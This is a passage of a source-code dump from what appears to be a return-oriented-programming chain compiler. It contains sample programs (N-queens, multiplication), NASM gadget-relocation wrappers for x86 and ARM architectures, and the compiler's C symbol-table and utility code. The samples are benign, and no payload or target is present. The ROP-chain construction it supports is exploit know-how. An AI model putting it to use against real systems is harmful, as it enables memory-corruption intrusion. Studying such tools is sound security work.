21 | b = b * 2; 22 | if (M) goto mul; 23 | printf("prod = %lu\n", P); 24 | exit(42); 25 | -------------------------------------------------------------------------------- /sample/rope3.c: -------------------------------------------------------------------------------- 1 | #ifdef ARM64 2 | #define PRINTF_ATTR [[regparm=1]] 3 | #else 4 | #define PRINTF_ATTR 5 | #endif 6 | 7 | #if BITS == 32 8 | #define SIZEOF_LONG 4 9 | #define SIGN_BIT 0x80000000 10 | #else 11 | #define SIZEOF_LONG 8 12 | #define SIGN_BIT 0x8000000000000000 13 | #endif 14 | 15 | extern printf PRINTF_ATTR; 16 | extern exit [[noreturn]]; 17 | 18 | /* 19 | void 20 | back(unsigned n, int *sol) 21 | { 22 | int k; 23 | init(k = 0, n, sol); 24 | while (k >= 0) next: { 25 | if (k == n) { 26 | retsol(n, sol); 27 | } else { 28 | while (sol[k] < n) { 29 | sol[k]++; 30 | if (cont(k, sol)) { 31 | init(++k, n, sol); 32 | goto next; 33 | } 34 | } 35 | } 36 | k--; 37 | } 38 | } 39 | */ 40 | 41 | #define QUEENS 42 | 43 | n = 4; 44 | sol = { 0, 0, 0, 0, 0, 0, 0, 0, 0 }; // must have at least n + 1 elements. first element is already primed 45 | 46 | k = 0; 47 | again: 48 | if !(k + 1) goto quit; // empty 49 | next: 50 | if (k - n) goto generate; 51 | // solution 52 | if !(i = n) goto backtrack; 53 | sol_ptr = sol; 54 | retsol: 55 | [[stack=0x400]]printf(" %d", *sol_ptr); 56 | sol_ptr = sol_ptr + SIZEOF_LONG; 57 | if (i = i - 1) goto retsol; 58 | [[stack=0x400]]printf("\n"); 59 | backtrack: 60 | k = k - 1; 61 | goto again; 62 | generate: 63 | // check the input domain [1..N] 64 | dst_ptr = elt_ptr = sol + k * SIZEOF_LONG; 65 | domain: 66 | if !(*elt_ptr - n) goto backtrack; // exhausted 67 | *dst_ptr = *elt_ptr + 1; // attempt next value 68 | cur_ptr = sol; 69 | #ifdef QUEENS 70 | j = 0; 71 | #endif 72 | cont: 73 | if !(cur_ptr - elt_ptr) goto advance; // accepted 74 | #ifdef QUEENS 75 | dif = *elt_ptr - *cur_ptr; 76 | if !(dif) goto domain; // (same row) try harder 77 | if !(dif & SIGN_BIT) goto ok; 78 | dif = 0 - dif; 79 | ok: 80 | if !(dif - k + j) goto domain; // (same diag) try harder 81 | j = j + 1; 82 | #else 83 | if !(*elt_ptr - *cur_ptr) goto domain; // try harder 84 | #endif 85 | cur_ptr = cur_ptr + SIZEOF_LONG; 86 | goto cont; 87 | advance: 88 | k = k + 1; 89 | new_ptr = elt_ptr + SIZEOF_LONG; 90 | *new_ptr = 0; // prime next element 91 | goto next; 92 | quit: 93 | exit(42); 94 | -------------------------------------------------------------------------------- /sample/rope3a.c: -------------------------------------------------------------------------------- 1 | #ifdef ARM64 2 | #define PRINTF_ATTR [[regparm=1]] 3 | #else 4 | #define PRINTF_ATTR 5 | #endif 6 | 7 | #if BITS == 32 8 | #define SIZEOF_LONG 4 9 | #define SIGN_BIT 0x80000000 10 | #else 11 | #define SIZEOF_LONG 8 12 | #define SIGN_BIT 0x8000000000000000 13 | #endif 14 | 15 | extern printf PRINTF_ATTR; 16 | extern exit [[noreturn]]; 17 | 18 | /* 19 | void 20 | back(unsigned n, int *sol) 21 | { 22 | int k; 23 | init(k = 0, n, sol); 24 | while (k >= 0) next: { 25 | if (k == n) { 26 | retsol(n, sol); 27 | } else { 28 | while (sol[k] < n) { 29 | sol[k]++; 30 | if (cont(k, sol)) { 31 | init(++k, n, sol); 32 | goto next; 33 | } 34 | } 35 | } 36 | k--; 37 | } 38 | } 39 | */ 40 | 41 | #define QUEENS 42 | 43 | n = 4; 44 | sol = { 0, 0, 0, 0, 0, 0, 0, 0, 0 }; // must have at least n + 1 elements. first element is already primed 45 | 46 | k = 0; 47 | while (k + 1) next: { 48 | if !(k - n) { 49 | // solution 50 | if (i = n) { 51 | sol_ptr = sol; 52 | do { 53 | [[stack=0x400]]printf(" %d", *sol_ptr); 54 | sol_ptr = sol_ptr + SIZEOF_LONG; 55 | } while (i = i - 1); 56 | [[stack=0x400]]printf("\n"); 57 | } 58 | backtrack: 59 | k = k - 1; 60 | continue; 61 | } 62 | // check the input domain [1..N] 63 | dst_ptr = elt_ptr = sol + k * SIZEOF_LONG; 64 | domain: while (*elt_ptr - n) { 65 | *dst_ptr = *elt_ptr + 1; // attempt next value 66 | cur_ptr = sol; 67 | #ifdef QUEENS 68 | j = 0; 69 | #endif 70 | while (cur_ptr - elt_ptr) { 71 | #ifdef QUEENS 72 | dif = *elt_ptr - *cur_ptr; 73 | if !(dif) goto domain; // (same row) try harder 74 | if (dif & SIGN_BIT) dif = 0 - dif; 75 | if !(dif - k + j) goto domain; // (same diag) try harder 76 | j = j + 1; 77 | #else 78 | if !(*elt_ptr - *cur_ptr) goto domain; // try harder 79 | #endif 80 | cur_ptr = cur_ptr + SIZEOF_LONG; 81 | } 82 | k = k + 1; 83 | new_ptr = elt_ptr + SIZEOF_LONG; 84 | *new_ptr = 0; // prime next element 85 | goto next; 86 | } 87 | goto backtrack; 88 | } 89 | exit(42); 90 | -------------------------------------------------------------------------------- /sample/wrap-arm.asm: -------------------------------------------------------------------------------- 1 | rope: 2 | dd 0 ; initial R7 3 | 4 | %define LG(x) ___gadget %+ x 5 | %define LU(x) ___local %+ x 6 | 7 | %macro dg 1 8 | LG(G): dd %1 9 | %assign G G+1 10 | %endmacro 11 | 12 | %macro du 1 13 | LU(U): dd %1 14 | %assign U U+1 15 | %endmacro 16 | 17 | %assign G 0 18 | %assign U 0 19 | 20 | %include "rop-arm.asm" 21 | 22 | align 4 23 | dd 0 ; begin gadget relocs 24 | 25 | %assign R 0 26 | %rep G 27 | dd LG(R) - rope 28 | %assign R R+1 29 | %endrep 30 | 31 | dd 0 ; begin pointer relocs 32 | 33 | %assign R 0 34 | %rep U 35 | dd LU(R) - rope 36 | %assign R R+1 37 | %endrep 38 | 39 | rope_end: 40 | -------------------------------------------------------------------------------- /sample/wrap-arm64.asm: -------------------------------------------------------------------------------- 1 | %define dd dq 2 | 3 | rope: 4 | dq 0 ; initial X29 5 | 6 | %define LG(x) ___gadget %+ x 7 | %define LU(x) ___local %+ x 8 | 9 | %macro dg 1 10 | LG(G): dd %1 11 | %assign G G+1 12 | %endmacro 13 | 14 | %macro du 1 15 | LU(U): dd %1 16 | %assign U U+1 17 | %endmacro 18 | 19 | %assign G 0 20 | %assign U 0 21 | 22 | %include "rop-arm64.asm" 23 | 24 | align 8 25 | dq 0 ; begin gadget relocs 26 | 27 | %assign R 0 28 | %rep G 29 | dq LG(R) - rope 30 | %assign R R+1 31 | %endrep 32 | 33 | dq 0 ; begin pointer relocs 34 | 35 | %assign R 0 36 | %rep U 37 | dq LU(R) - rope 38 | %assign R R+1 39 | %endrep 40 | 41 | rope_end: 42 | -------------------------------------------------------------------------------- /sample/wrap-x86.asm: -------------------------------------------------------------------------------- 1 | rope: 2 | dd 0 ; initial EBP 3 | 4 | %define LG(x) ___gadget %+ x 5 | %define LU(x) ___local %+ x 6 | 7 | %macro dg 1 8 | LG(G): dd %1 9 | %assign G G+1 10 | %endmacro 11 | 12 | %macro du 1 13 | LU(U): dd %1 14 | %assign U U+1 15 | %endmacro 16 | 17 | %assign G 0 18 | %assign U 0 19 | 20 | %include "rop-x86.asm" 21 | 22 | align 4 23 | dd 0 ; begin gadget relocs 24 | 25 | %assign R 0 26 | %rep G 27 | dd LG(R) - rope 28 | %assign R R+1 29 | %endrep 30 | 31 | dd 0 ; begin pointer relocs 32 | 33 | %assign R 0 34 | %rep U 35 | dd LU(R) - rope 36 | %assign R R+1 37 | %endrep 38 | 39 | rope_end: 40 | -------------------------------------------------------------------------------- /sample/wrap-x86_64.asm: -------------------------------------------------------------------------------- 1 | %define dd dq 2 | 3 | rope: 4 | dq 0 ; initial RBP 5 | 6 | %define LG(x) ___gadget %+ x 7 | %define LU(x) ___local %+ x 8 | 9 | %macro dg 1 10 | LG(G): dd %1 11 | %assign G G+1 12 | %endmacro 13 | 14 | %macro du 1 15 | LU(U): dd %1 16 | %assign U U+1 17 | %endmacro 18 | 19 | %assign G 0 20 | %assign U 0 21 | 22 | %include "rop-x86_64.asm" 23 | 24 | align 8 25 | dq 0 ; begin gadget relocs 26 | 27 | %assign R 0 28 | %rep G 29 | dq LG(R) - rope 30 | %assign R R+1 31 | %endrep 32 | 33 | dq 0 ; begin pointer relocs 34 | 35 | %assign R 0 36 | %rep U 37 | dq LU(R) - rope 38 | %assign R R+1 39 | %endrep 40 | 41 | rope_end: 42 | -------------------------------------------------------------------------------- /symtab.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include /* XXX for debug */ 3 | #include 4 | #include 5 | #include "config.h" 6 | #include "util.h" 7 | #include "symtab.h" 8 | 9 | 10 | static struct SYM *symtab = NULL; 11 | 12 | 13 | static struct SYM * 14 | new_symbol(const char *key, const void *val, int type) 15 | { 16 | struct SYM *p = malloc(sizeof(struct SYM)); 17 | if (p) { 18 | p->used = UNUSED; 19 | p->type = type; 20 | p->idx = 0; 21 | p->addr = 0; 22 | p->attr = 0; 23 | p->regparm = -1; 24 | p->restack = -1; 25 | p->key = xstrdup(key); 26 | p->val = val ? xstrdup(val) : NULL; 27 | p->next = symtab; 28 | } 29 | assert(p); 30 | return p; 31 | } 32 | 33 | 34 | const struct SYM * 35 | get_symbol(const char *key) 36 | { 37 | struct SYM *p; 38 | for (p = symtab; p; p = p->next) { 39 | if (!strcmp(p->key, key)) { 40 | break; 41 | } 42 | } 43 | return p; 44 | } 45 | 46 | 47 | void 48 | add_symbol_defined(const char *key, const void *val, int attr) 49 | { 50 | const struct SYM *p = get_symbol(key); 51 | if (p) { 52 | die("symbol '%s' already defined\n", key); 53 | } 54 | assert(val); 55 | symtab = new_symbol(key, val, SYMBOL_NORMAL); 56 | symtab->attr |= attr; 57 | } 58 | 59 | 60 | void 61 | add_symbol_forward(const char *key, int attr) 62 | { 63 | const struct SYM *p = get_symbol(key); 64 | if (p) { 65 | return; 66 | } 67 | symtab = new_symbol(key, NULL, SYMBOL_NORMAL); 68 | symtab->attr |= attr; 69 | } 70 | 71 | 72 | enum use_t 73 | get_symbol_used(const char *key) 74 | { 75 | const struct SYM *p = get_symbol(key); 76 | if (!p) { 77 | die("symbol '%s' not defined\n", key); 78 | } 79 | return p->used; 80 | } 81 | 82 | 83 | void 84 | make_symbol_used(const char *key) 85 | { 86 | struct SYM *p = (struct SYM *)get_symbol(key); // wrong cast 87 | if (!p) { 88 | die("symbol '%s' not defined\n", key); 89 | } 90 | if (p->type != SYMBOL_EXTERN) { 91 | if (p->type != SYMBOL_NORMAL) { 92 | cry("using symbol '%s' is probably wrong\n", key); 93 | } 94 | p->used = USED; 95 | } 96 | } 97 | 98 | 99 | void 100 | mark_all_used(enum use_t u) 101 | { 102 | struct SYM *p; 103 | for (p = symtab; p; p = p->next) { 104 | if (p->used == USED) { 105 | p->used = u; 106 | } 107 | } 108 | } 109 | 110 | 111 | BOOL 112 | try_symbol_extern(const char *key) 113 | { 114 | const struct SYM *p = get_symbol(key); 115 | if (!p) { 116 | /* XXX die("symbol '%s' not defined\n", key); */ 117 | return FALSE; 118 | } 119 | return (p->type == SYMBOL_EXTERN); 120 | } 121 | 122 | 123 | int 124 | try_symbol_attr(const char *key) 125 | { 126 | const struct SYM *p = get_symbol(key); 127 | if (!p) { 128 | /* die("symbol '%s' not defined\n", key); */ 129 | return 0; 130 | } 131 | return p->attr; 132 | } 133 | 134 | 135 | int 136 | try_symbol_regparm(const char *key) 137 | { 138 | const struct SYM *p = get_symbol(key); 139 | if (!p) { 140 | /* die("symbol '%s' not defined\n", key); */ 141 | return -1; 142 | } 143 | if (p->attr & ATTRIB_REGPARM) { 144 | return p->regparm; 145 | } 146 | return -1; 147 | } 148 | 149 | 150 | void 151 | emit_symbols(void) 152 | { 153 | struct SYM *p; 154 | for (p = symtab; p; p = p->next) { 155 | if (p->used == UNUSED) { 156 | switch (p->type) { 157 | case SYMBOL_NORMAL: 158 | if (p->val) { 159 | if (is_address(p->val)) { 160 | char *na = curate_address(p->val); 161 | printx("%-7s du %s\n", p->key, na); 162 | free(na); 163 | } else if (try_symbol_extern(p->val)) { 164 | printx("%-7s dg 0x%-28llX; -> %s\n", p->key, get_symbol(p->val)->addr, p->val); 165 | } else { 166 | printx("%-7s dd %s\n", p->key, p->val); 167 | } 168 | } else if (p->attr & ATTRIB_VOLATILE) { 169 | printx("%-7s dd 0\n", p->key); 170 | } else if (no_undefined) { 171 | printx("%-7s dd 0\n", p->key); 172 | } else { 173 | printx(";-- %s = ?\n", p->key); 174 | } 175 | break; 176 | case SYMBOL_STRING: 177 | case SYMBOL_EXTERN: 178 | case SYMBOL_LABEL: 179 | break; 180 | default: { 181 | int i; 182 | printx("%s:\n", p->key); 183 | for (i = 0; i < p->type; i++) { 184 | char *val = ((char **)p->val)[i]; 185 | if (is_address(val)) { 186 | char *na = curate_address(val); 187 | printx(" du %s\n", na); 188 | free(na); 189 | } else if (try_symbol_extern(val)) { 190 | printx(" dg 0x%-28llX; -> %s\n", get_symbol(val)->addr, val); 191 | } else { 192 | printx(" dd %s\n", val); 193 | } 194 | free(val); 195 | } 196 | } 197 | } 198 | } 199 | } 200 | for (p = symtab; p; p = p->next) { 201 | if (p->used == UNUSED && p->type == SYMBOL_STRING) { 202 | printx("%-7s db %s, 0\n", p->key, p->val); 203 | } 204 | } 205 | } 206 | 207 | 208 | void 209 | free_symbols(void) 210 | { 211 | struct SYM *p, *q; 212 | for (p = symtab; p; ) { 213 | q = p->next; 214 | #if 0 215 | if (p->used == UNUSED) { 216 | switch (p->type) { 217 | case SYMBOL_NORMAL: 218 | printf(";-- %s = %s\n", p->key, p->val ? p->val : "?"); 219 | break; 220 | case SYMBOL_STRING: 221 | printf(";-- %s = %s, 0\n", p->key, p->val); 222 | break; 223 | case SYMBOL_EXTERN: 224 | case SYMBOL_LABEL: 225 | break; 226 | default: { 227 | int i; 228 | printf(";-- %s = {\n", p->key); 229 | for (i = 0; i < p->type; i++) { 230 | char *val = ((char **)p->val)[i]; 231 | printf("\t%s\n", val); 232 | free(val); 233 | } 234 | printf("}\n"); 235 | } 236 | } 237 | } 238 | #endif 239 | free(p->key); 240 | free(p->val); 241 | free(p); 242 | p = q; 243 | } 244 | symtab = p; 245 | } 246 | 247 | 248 | /*** strings ******************************************************************/ 249 | 250 | 251 | char * 252 | add_string(const char *arg) 253 | { 254 | char *tmp; 255 | struct SYM *p; 256 | char *esc = NULL; 257 | if (nasm_esc_str) { 258 | size_t len = strlen(arg); 259 | assert(len); 260 | esc = xmalloc(len + 1); 261 | memmove(esc, arg, len + 1); 262 | esc[0] = esc[len - 1] = '`'; 263 | arg = esc; 264 | } 265 | for (p = symtab; p; p = p->next) { 266 | if (p->type == SYMBOL_STRING && !strcmp(p->val, arg)) { 267 | free(esc); 268 | return p->key; 269 | } 270 | } 271 | tmp = new_name("str"); 272 | symtab = new_symbol(tmp, arg, SYMBOL_STRING); 273 | free(tmp); 274 | free(esc); 275 | return symtab->key; 276 | } 277 | 278 | 279 | char * 280 | add_vector(const char **args, int narg) 281 | { 282 | char *tmp; 283 | assert(narg); 284 | tmp = new_name("vec"); /* XXX coallesce */ 285 | symtab = new_symbol(tmp, NULL, narg); 286 | free(tmp); 287 | symtab->val = (void *)args; /* XXX abuse */ 288 | return symtab->key; 289 | } 290 | 291 | 292 | void 293 | add_extern(const char *import, unsigned long long addr, int attr, int regparm) 294 | { 295 | const struct SYM *p = get_symbol(import); 296 | if (p) { 297 | die("symbol '%s' already defined\n", import); 298 | } 299 | symtab = new_symbol(import, NULL, SYMBOL_EXTERN); 300 | symtab->addr = addr; 301 | symtab->attr = attr; 302 | symtab->regparm = regparm; 303 | symtab->restack = -1; 304 | } 305 | 306 | 307 | void 308 | add_label(const char *label, int idx) 309 | { 310 | const struct SYM *p = get_symbol(label); 311 | if (p) { 312 | die("symbol '%s' already defined\n", label); 313 | } 314 | symtab = new_symbol(label, NULL, SYMBOL_LABEL); 315 | symtab->idx = idx; 316 | } 317 | 318 | 319 | const char * 320 | get_label_with_label(const char *target) 321 | { 322 | struct SYM *p; 323 | for (p = symtab; p; p = p->next) { 324 | if (p->type == SYMBOL_LABEL && p->val && !strcmp(p->val, target)) { 325 | return p->key; 326 | } 327 | } 328 | return NULL; 329 | } 330 | 331 | 332 | void 333 | set_label_with_label(const char *label, const char *target) 334 | { 335 | struct SYM *p = (struct SYM *)get_symbol(label); // wrong cast 336 | if (!p) { 337 | die("symbol '%s' not defined\n", label); 338 | } 339 | if (p->type != SYMBOL_LABEL) { 340 | die("symbol '%s' is not a label\n", label); 341 | } 342 | if (p->val) { 343 | die("symbol '%s' cannot be reused\n", label); 344 | } 345 | p->val = xstrdup(target); 346 | } 347 | -------------------------------------------------------------------------------- /symtab.h: -------------------------------------------------------------------------------- 1 | #ifndef SYMTAB_H_ 2 | #define SYMTAB_H_ 3 | 4 | #define SYMBOL_VECTOR >0 /* number of elements */ 5 | #define SYMBOL_NORMAL 0 6 | #define SYMBOL_STRING -1 7 | #define SYMBOL_EXTERN -2 8 | #define SYMBOL_LABEL -3 9 | 10 | #define ATTRIB_CONSTANT (1<<0) 11 | #define ATTRIB_VOLATILE (1<<1) 12 | #define ATTRIB_NORETURN (1<<2) 13 | #define ATTRIB_STDCALL (1<<3) 14 | #define ATTRIB_STACK (1<<4) 15 | #define ATTRIB_REGPARM (1<<5) 16 | #define ATTRIB_UNKNOWN (1<<31) 17 | 18 | enum use_t { 19 | CLOBBERED = -1, 20 | UNUSED, 21 | USED, 22 | PROTECTED 23 | }; 24 | 25 | struct SYM { 26 | struct SYM *next; 27 | int type; /* see SYMBOL_* */ 28 | int attr; /* see ATTRIB_* */ 29 | int regparm; 30 | int restack; 31 | char *key; 32 | char *val; 33 | enum use_t used; 34 | int idx; /* label specific */ 35 | unsigned long long addr; /* extern specific */ 36 | }; 37 | 38 | const struct SYM *get_symbol(const char *key); 39 | 40 | void add_symbol_defined(const char *key, const void *val, int attr); 41 | void add_symbol_forward(const char *key, int attr); 42 | 43 | enum use_t get_symbol_used(const char *key); 44 | void make_symbol_used(const char *key); 45 | void mark_all_used(enum use_t u); 46 | 47 | BOOL try_symbol_extern(const char *key); 48 | int try_symbol_attr(const char *key); 49 | int try_symbol_regparm(const char *key); 50 | 51 | void emit_symbols(void); 52 | void free_symbols(void); 53 | 54 | char *add_string(const char *arg); 55 | char *add_vector(const char **args, int narg); 56 | void add_extern(const char *import, unsigned long long addr, int attr, int regparm); 57 | void add_label(const char *label, int idx); 58 | 59 | const char *get_label_with_label(const char *target); 60 | void set_label_with_label(const char *label, const char *target); 61 | 62 | #endif 63 | -------------------------------------------------------------------------------- /util.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include "config.h" 11 | #include "util.h" 12 | #include "lexer.h" 13 | 14 | 15 | #define isalnu_(c) (isalnum(c) || ((c) == '_')) 16 | 17 | 18 | #define ADDRESS_MARK '@' 19 | 20 | 21 | #ifndef __GNUC__ 22 | int 23 | popcount(unsigned int v) 24 | { 25 | int c; 26 | for (c = 0; v; c++) { 27 | v &= v - 1; 28 | } 29 | return c; 30 | } 31 | #endif 32 | 33 | 34 | void * 35 | xmalloc(size_t size) 36 | { 37 | void *p = malloc(size); 38 | assert(p); 39 | return p; 40 | } 41 | 42 | 43 | char * 44 | xstrdup(const char *s) 45 | { 46 | void *p = strdup(s); 47 | assert(p); 48 | return p; 49 | } 50 | 51 | 52 | void * 53 | reverse_list(void *n) 54 | { 55 | struct { 56 | void *next; 57 | } *next, *prev = NULL, *node = n; 58 | while (node) { 59 | next = node->next; 60 | node->next = prev; 61 | prev = node; 62 | node = next; 63 | } 64 | return prev; 65 | } 66 | 67 | 68 | void * 69 | append_list(void *list, void *n) 70 | { 71 | if (n) { 72 | struct { 73 | void *next; 74 | } *head = list; 75 | if (!head) { 76 | return n; 77 | } 78 | while (head->next) { 79 | head = head->next; 80 | } 81 | head->next = n; 82 | } 83 | return list; 84 | } 85 | 86 | 87 | char * 88 | new_name(const char *tmpl) 89 | { 90 | char *p, tmp[256]; 91 | snprintf(tmp, sizeof(tmp), "L_%s_%d", tmpl, new_name_off++); 92 | p = strdup(tmp); 93 | assert(p); 94 | return p; 95 | } 96 | 97 | 98 | char * 99 | prepend(int ch, const char *str) 100 | { 101 | int len = strlen(str) + 1; 102 | char *p = malloc(len + 1); 103 | if (p) { 104 | p[0] = ch; 105 | memcpy(p + 1, str, len); 106 | } 107 | assert(p); 108 | return p; 109 | } 110 | 111 | 112 | char * 113 | create_address_str(const char *str, int offset) 114 | { 115 | if (offset) { 116 | int len = strlen(str) + 1; 117 | char *p = malloc(len + 16); 118 | if (p) { 119 | p[0] = ADDRESS_MARK; 120 | memcpy(p + 1, str, len - 1); 121 | sprintf(p + len, " %+d", offset); 122 | } 123 | assert(p); 124 | return p; 125 | } 126 | return prepend(ADDRESS_MARK, str); 127 | } 128 | 129 | 130 | char * 131 | create_number_str(BOOL negative, const char *str) 132 | { 133 | char *p; 134 | if (str[0] == '0' && str[1] && tolower(str[1]) != 'x') { 135 | /* parse octals */ 136 | unsigned long number = 0; 137 | for (++str; *str; str++) { 138 | number = number * 8 + (*str - '0'); 139 | } 140 | p = malloc(32); 141 | if (p) { 142 | char *q = p; 143 | if (negative) { 144 | *q++ = '-'; 145 | } 146 | sprintf(q, "%lu", number); 147 | } 148 | } else if (negative) { 149 | p = prepend('-', str); 150 | } else { 151 | p = strdup(str); 152 | } 153 | assert(p); 154 | return p; 155 | } 156 | 157 | 158 | char * 159 | create_op_str(const char *str1, const char *str2, int op) 160 | { 161 | int len1; 162 | int len2; 163 | char *p; 164 | #if 0 165 | do { 166 | unsigned long long num1; 167 | unsigned long long num2; 168 | errno = 0; 169 | num1 = strtoull(str1, &p, 0); 170 | if (errno || p <= str1 || *p) { 171 | break; 172 | } 173 | errno = 0; 174 | num2 = strtoull(str2, &p, 0); 175 | if (errno || p <= str2 || *p) { 176 | break; 177 | } 178 | switch (op) { 179 | case '+': 180 | num1 += num2; 181 | break; 182 | case '-': 183 | num1 -= num2; 184 | break; 185 | case '*': 186 | num1 *= num2; 187 | break; 188 | case '&': 189 | num1 &= num2; 190 | break; 191 | case '|': 192 | num1 &= num2; 193 | break; 194 | case '^': 195 | num1 &= num2; 196 | break; 197 | default: 198 | continue; 199 | } 200 | p = malloc(32); 201 | if (!p) { 202 | break; 203 | } 204 | sprintf(p, "%llu", num1); 205 | return p; 206 | } while (0); 207 | #endif 208 | if (is_address(str2) && (op == '+' || op == '*' || op == '&' || op == '|' || op == '^')) { 209 | const char *tmp; 210 | assert(!is_address(str1)); 211 | tmp = str1; 212 | str1 = str2; 213 | str2 = tmp; 214 | } 215 | len1 = strlen(str1); 216 | len2 = strlen(str2); 217 | p = malloc(1 + len1 + 3 + len2 + 1 + 1); 218 | if (p) { 219 | p[0] = '('; 220 | memcpy(p + 1, str1, len1); 221 | p[++len1] = ' '; 222 | p[++len1] = op; 223 | p[++len1] = ' '; 224 | memcpy(p + 1 + len1, str2, len2); 225 | p[1 + len1 + len2] = ')'; 226 | p[1 + len1 + len2 + 1] = '\0'; 227 | } 228 | assert(p); 229 | return p; 230 | } 231 | 232 | 233 | int 234 | is_pot_str(const char *str) 235 | { 236 | char *p; 237 | int trailing = 0; 238 | unsigned long long b; 239 | errno = 0; 240 | b = strtoull(str, &p, 0); 241 | if (errno || p <= str || *p) { 242 | return -1; 243 | } 244 | if (b == 0) { 245 | return 0; 246 | } 247 | if (b & (b - 1)) { 248 | return -1; 249 | } 250 | do { 251 | trailing++; 252 | } while (b >>= 1); 253 | return trailing; 254 | } 255 | 256 | 257 | const char * 258 | is_address(const char *str) 259 | { 260 | str = strchr(str, ADDRESS_MARK); 261 | if (!str) { 262 | return NULL; 263 | } 264 | assert(!strchr(str + 1, ADDRESS_MARK)); 265 | return str; 266 | } 267 | 268 | 269 | char * 270 | curate_address(const char *str) 271 | { 272 | char *p; 273 | size_t len = strlen(str); 274 | const char *at = is_address(str); 275 | assert(at && !strchr(at + 1, ADDRESS_MARK)); 276 | p = malloc(len); 277 | if (p) { 278 | size_t pos = at - str; 279 | memcpy(p, str, pos); 280 | strcpy(p + pos, at + 1); 281 | } 282 | assert(p); 283 | return p; 284 | } 285 | 286 | 287 | char * 288 | copy_address_sym(const char *str) 289 | { 290 | str = is_address(str); 291 | if (str) { 292 | int len; 293 | char *p; 294 | const char *s; 295 | for (s = str + 1; isalnu_(*s); s++) { 296 | } 297 | len = s - str; 298 | p = malloc(len); 299 | if (p) { 300 | len--; 301 | memcpy(p, str + 1, len); 302 | p[len] = '\0'; 303 | } 304 | assert(p); 305 | return p; 306 | } 307 | return NULL; 308 | } 309 | 310 | 311 | unsigned int 312 | hash(const char *p) 313 | { 314 | unsigned int h = *p; 315 | if (h) { 316 | for (p += 1; *p; p++) { 317 | h = (h << 5) - h + *p; 318 | } 319 | } 320 | return h; 321 | } 322 | 323 | 324 | void 325 | die(const char *fmt, ...) 326 | { 327 | va_list ap; 328 | fprintf(stderr, "%s:%d: error: ", token.filename, token.lineno); 329 | va_start(ap, fmt); 330 | vfprintf(stderr, fmt, ap); 331 | va_end(ap); 332 | exit(1); 333 | } 334 | 335 | 336 | void 337 | cry(const char *fmt, ...) 338 | { 339 | va_list ap; 340 | fprintf(stderr, "%s:%d: warning: ", token.filename, token.lineno); 341 | va_start(ap, fmt); 342 | vfprintf(stderr, fmt, ap); 343 | va_end(ap); 344 | } 345 | 346 | 347 | static char *outfn = NULL; 348 | static FILE *outfp = NULL; 349 | 350 | int 351 | printx(const char *fmt, ...) 352 | { 353 | int rv; 354 | va_list ap; 355 | va_start(ap, fmt); 356 | rv = vfprintf(outfp ? outfp : stdout, fmt, ap); 357 | va_end(ap); 358 | return rv; 359 | } 360 | 361 | void 362 | new_printer(const char *filename) 363 | { 364 | if (outfn) { 365 | FILE *f; 366 | char buf[BUFSIZ]; 367 | assert(outfp); 368 | fflush(outfp); 369 | rewind(outfp); 370 | f = fopen(outfn, "wt"); 371 | if (!f) { 372 | errx(1, "cannot write to '%s'", outfn); 373 | } 374 | while (fgets(buf, sizeof(buf), outfp)) { 375 | fputs(buf, f); 376 | } 377 | fclose(f); 378 | fclose(outfp); 379 | free(outfn); 380 | } 381 | 382 | if (!filename) { 383 | outfn = NULL; 384 | outfp = NULL; 385 | return; 386 | } 387 | 388 | outfn = xstrdup(filename); 389 | outfp = tmpfile(); 390 | assert(outfp); 391 | unlink(outfn); 392 | } 393 | -------------------------------------------------------------------------------- /util.h: -------------------------------------------------------------------------------- 1 | #ifndef UTIL_H_ 2 | #define UTIL_H_ 3 | 4 | #ifndef FALSE 5 | #define FALSE 0 6 | #define TRUE !FALSE 7 | typedef int BOOL; 8 | #endif 9 | /* 10 | #include 11 | #define BOOL bool 12 | #define TRUE true 13 | #define FALSE false 14 | */ 15 | 16 | #define SWAP_PTR(s, a, b) \ 17 | do { \ 18 | if (s) { \ 19 | const void *tmp = a; \ 20 | a = b; \ 21 | b = (void *)tmp; \ 22 | } \ 23 | } while (0) 24 | 25 | #ifndef __GNUC__ 26 | int popcount(unsigned int v); 27 | #else 28 | #define popcount __builtin_popcount 29 | #endif 30 | 31 | void *xmalloc(size_t size); 32 | char *xstrdup(const char *s); 33 | 34 | void *reverse_list(void *n); 35 | void *append_list(void *list, void *n); 36 | 37 | char *new_name(const char *tmpl); 38 | char *prepend(int ch, const char *str); 39 | 40 | char *create_address_str(const char *str, int offset); 41 | char *create_number_str(BOOL negative, const char *str); 42 | char *create_op_str(const char *str1, const char *str2, int op); 43 | 44 | int is_pot_str(const char *str); 45 | 46 | const char *is_address(const char *str); 47 | char *curate_address(const char *str); 48 | char *copy_address_sym(const char *str); 49 | 50 | unsigned int hash(const char *p); 51 | 52 | void die(const char *fmt, ...) __attribute__ ((format(printf, 1, 2), noreturn)); 53 | void cry(const char *fmt, ...) __attribute__ ((format(printf, 1, 2))); 54 | 55 | int printx(const char *fmt, ...) __attribute__ ((format(printf, 1, 2))); 56 | void new_printer(const char *filename); 57 | 58 | #endif 59 | --------------------------------------------------------------------------------